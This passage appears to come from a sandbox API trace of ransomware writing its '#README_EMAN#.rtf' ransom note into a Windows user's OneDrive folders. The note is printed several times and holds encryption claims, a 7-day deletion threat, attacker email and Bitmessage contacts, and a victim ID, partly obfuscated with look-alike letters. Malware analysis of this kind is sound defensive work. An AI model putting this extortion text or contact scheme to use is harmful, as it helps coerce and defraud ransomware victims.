ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x13\n", lpUsedDefaultChar=0x0) returned 8717 [0299.814] WriteFile (in: hFile=0x2f4, lpBuffer=0x248a258*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248a258*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0299.815] CloseHandle (hObject=0x2f4) returned 1 [0299.815] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Layouts\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\qml\\qtquick\\layouts\\#readme_eman#.rtf")) returned 0xffffffff [0299.815] GetLastError () returned 0x2 [0299.815] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Layouts\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\qml\\qtquick\\layouts\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f4 [0299.816] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0299.816] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0299.816] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd 